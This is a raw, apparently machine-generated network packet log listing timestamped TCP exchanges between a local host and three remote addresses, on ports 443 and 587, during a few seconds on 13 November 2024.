Nov 13, 2024 16:28:07.821166039 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.821177006 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.821352959 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.821369886 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.821417093 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.821420908 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.821453094 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.821613073 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.821630001 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.821675062 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.821679115 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.821718931 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.822536945 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.822559118 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.822591066 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.822594881 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.822633982 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.822779894 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.822797060 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.822841883 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.822845936 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.822897911 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.822897911 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.823211908 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.823227882 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.823266983 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.823271036 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.823318005 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.823913097 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.823932886 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.823976994 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.823981047 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.824009895 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.824019909 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.824043036 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.824060917 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.824085951 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.824090004 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.824110985 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.824127913 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.824645996 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.824662924 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.824728966 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.824733019 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.824769020 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.828026056 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.828047991 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.828093052 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.828097105 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.828140974 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.828485012 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.828505993 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.828550100 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.828552961 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.828593016 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.829129934 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.829147100 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.829180956 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.829184055 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.829207897 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.829230070 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.829850912 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.829900980 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.829941034 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.829943895 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.829986095 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.830591917 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.830614090 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.830648899 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.830651999 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.830673933 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.830689907 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.830807924 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.830822945 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.830862045 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.830864906 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.830883980 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.830908060 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.831434011 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.831607103 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.831631899 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.831674099 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.831677914 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.831732035 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.832447052 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.832468033 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.832500935 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.832504988 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.832544088 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.832561016 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.832838058 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.833357096 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.833376884 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.833434105 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.833436966 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.833466053 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.833493948 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.848541021 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.848566055 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.848630905 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.848658085 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.848706961 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.871284962 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.871309996 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.871356964 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.871375084 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.871392012 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.871412992 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.872087955 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.872102976 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.872168064 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.872173071 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.872211933 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.872737885 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.872752905 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.872807026 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.872812033 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.872852087 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.936954975 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.936981916 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.937022924 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.937053919 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.937079906 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.937114000 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.937164068 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.937282085 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.937298059 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.937331915 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.937335968 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.937357903 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.965300083 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.965326071 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.965405941 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.965411901 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.987925053 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.987946987 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.988069057 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.988075018 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.988699913 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.988720894 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.988801003 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.988805056 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.989617109 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.989633083 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.989720106 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.989725113 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.040770054 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.053781986 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.053808928 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.053909063 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.053914070 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.053957939 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.054171085 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.054195881 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.054243088 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.054246902 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.054285049 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.054625034 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.054642916 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.054688931 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.054692984 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.054725885 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.081942081 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.081967115 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.082076073 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.082082987 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.082135916 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.104532003 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.104558945 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.104670048 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.104677916 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.104723930 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.105274916 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.105293989 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.105345011 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.105349064 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.105376959 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.105943918 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.105966091 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.106024981 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.106029034 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.106065035 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.106482983 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.106503963 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.106560946 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.106564045 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.106599092 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.170888901 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.170919895 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.171020031 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.171026945 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.171068907 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.171380997 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.171405077 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.171494007 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.171499014 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.171536922 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.172322035 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.172338009 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.172388077 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.172393084 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.172432899 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.221107006 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.221132994 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.221213102 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.221239090 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.221272945 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.221868038 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.221884966 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.221935987 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.221940041 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.221975088 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.222421885 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.222439051 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.222493887 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.222496986 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.222527981 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.223001003 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.223016977 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.223068953 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.223073006 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.223105907 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.287450075 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.287471056 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.287560940 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.287585020 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.287626028 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.287971973 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.287990093 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.288043022 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.288048029 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.288077116 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.288433075 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.288449049 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.288496971 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.288501978 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.288578987 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.289103031 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.289119959 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.289175034 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.289180040 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.289216042 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.338515997 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.338534117 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.338685036 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.338695049 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.338747978 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.339392900 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.339409113 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.339464903 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.339468956 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.339565992 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.340064049 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.340079069 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.340156078 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.340159893 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.340193033 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.340810061 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.340825081 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.340908051 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.340910912 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.340956926 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.404160023 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.404184103 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.404294968 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.404319048 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.404362917 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.404565096 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.404581070 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.404637098 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.404642105 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.404676914 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.405139923 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.405153036 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.405198097 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.405201912 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.405224085 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.405245066 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.405425072 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.405486107 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.405492067 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.405544996 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.406148911 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.406163931 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:08.406173944 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:08.406178951 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:13.561933041 CET	49706	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:13.561986923 CET	443	49706	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:13.563649893 CET	49706	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:13.568435907 CET	49706	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:13.568449974 CET	443	49706	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:15.320354939 CET	443	49706	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:15.320457935 CET	49706	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:15.325083971 CET	49706	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:15.325114965 CET	443	49706	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:15.325418949 CET	443	49706	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:15.434757948 CET	49706	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:15.444399118 CET	49706	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:15.487334967 CET	443	49706	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:15.695704937 CET	443	49706	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:15.695787907 CET	443	49706	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:15.695832014 CET	49706	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:15.701812983 CET	49706	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:17.714835882 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:17.719830036 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:17.720009089 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:18.608449936 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:18.608804941 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:18.613799095 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:18.849797964 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:18.856316090 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:18.861339092 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:19.098189116 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:19.099334955 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:19.105592966 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:19.347496033 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:19.347516060 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:19.347527981 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:19.347624063 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:19.347655058 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:19.347716093 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:19.394443035 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:19.399334908 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:19.636101961 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:19.673415899 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:19.678930044 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:19.914810896 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:19.923794031 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:19.928988934 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:20.165448904 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:20.166414976 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:20.171304941 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:20.419944048 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:20.420449972 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:20.427407980 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:20.665560961 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:20.665745020 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:20.670794010 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:20.911216974 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:20.911386967 CET	49708	587	192.168.2.5	51.195.88.199
